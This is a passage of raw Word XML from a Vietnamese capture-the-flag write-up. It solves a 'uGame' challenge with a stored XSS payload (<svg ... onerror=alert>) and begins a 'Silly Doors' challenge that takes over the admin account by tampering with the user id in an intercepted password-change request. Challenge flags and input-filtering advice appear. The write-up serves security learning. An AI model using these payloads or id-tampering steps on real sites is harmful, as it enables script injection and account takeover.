          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>flag :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Flag{X55_D4mn_G00D}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2842E43A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Khuyến cáo: Thực hiện lọc đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293A4549" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B80CE8C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_heading=h.tia9thq7y1x5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản uGame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5780A035" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>uGame - information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8EF8CD" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện truyền payload để bật bảng thông báo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EBD1BA"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58D98CC8" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đầu tiên khi vào thì chương trình cho ta 1 giao diện web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFAC80C"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0425DF94" wp14:editId="3BFEF28E">
            <wp:extent cx="6114105" cy="6616700"/>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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="6616700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD943B6" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi nhập input ta thấy được thông tin đã được add thêm vào </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>trong</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49075E4E"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3EABF77F" wp14:editId="664288AB">
            <wp:extent cx="5210175" cy="5381625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19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2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5210175" cy="5381625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB9B139" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Với kết quả trả về này ta có thể thấy được rằng là đây là kiểu tấn công XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D0BE37" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ta sẽ kiểm tra thêm bằng việc thử 1 số câu </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>lệnh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="631DE3AC"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2181F78B" wp14:editId="120246CC">
            <wp:extent cx="6114105" cy="2387600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="2387600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB43753" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cuối cùng, ta sẽ thực hiện chèn payload &lt;svg src=kiet onerror=alert("kiet")&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BB1110"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7C62B588" wp14:editId="71DB0FCD">
            <wp:extent cx="6114105" cy="6527800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="6527800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8A8F92" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Save lại và ta nhận được </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4DB29826"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7BFA0CCD" wp14:editId="42CA12E0">
            <wp:extent cx="6114105" cy="901700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="901700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5783C7EA" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Flag{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>N!c</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>3_Y0u_G07_My_X55}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75993B3D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Khuyến cáo: Thực hiện lọc đầu vào với các file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12828E32" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_heading=h.chdzkveu4rcs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản Silly Doors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3595D188" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Silly Doors - data, information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F941F2E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện việc chỉnh sửa gói tin và lấy thông tin để leo quyền admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007CFA36"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55979C91" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Đầu tiên vào trang thì thấy được yêu cầu đăng nhập, thử với tài khoản </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>admin  admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thì không có chuyện gì xảy ra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345E544C"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5D4305B2" wp14:editId="6F3E7433">
            <wp:extent cx="6114105" cy="6591300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="6591300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D4C2F3" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kiểm tra các trường thông tin thì thấy được trang signup.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A47A7DC"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49FCB001" wp14:editId="7DF8EA5B">
            <wp:extent cx="6114105" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1981200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FF9CFB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ta vào được trang signup và thực hiện đăng </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ký</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4E361EFA"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514396A6" wp14:editId="28F7463B">
            <wp:extent cx="6114105" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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114105" cy="3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4F35D7" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sau khi đăng ký xong ta có thể login vào trang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D1247D"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314E1CCD" wp14:editId="1CB3B65F">
            <wp:extent cx="6114105" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C71AFC5" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ở đây ta thấy url có id=6 vậy có thể id=1 là quyền admin, ta sẽ thử thực hiện leo quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5070E2AB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ở đây ta không thể trực tiếp chỉnh sửa trên url được, ta sẽ thực hiện bắt gói tin và chỉnh sửa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B4AC9D"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35682272" wp14:editId="76FE3146">
            <wp:extent cx="6114105" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="685800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4ECB7D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tiếp theo ta sẽ thực hiện chỉnh sửa password để bắt gói tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE16D0E"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10B53DAC" wp14:editId="140BB10D">
            <wp:extent cx="6114105" cy="6680200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="6680200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F21621E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ta thực hiện bắt gói tin chỉnh sửa, chỉnh sửa id thành 1 và gửi </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>đi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0EBDDCF0"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1F93F0BA" wp14:editId="0986E178">
            <wp:extent cx="6114105" cy="6527800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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6114105" cy="6527800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D193F8" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>thông báo nhận được khi chỉnh sửa thành công password và gửi đi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17264E17"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16848087" wp14:editId="74437CE7">
            <wp:extent cx="6114105" cy="1384300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1384300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="338E764A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B5CB59E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sau đó thực hiện đăng nhập với tài khoản admin và password mới vừa thực hiện đổi, ở đây do thực hiện sai nhiều lần nên password cuối là </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
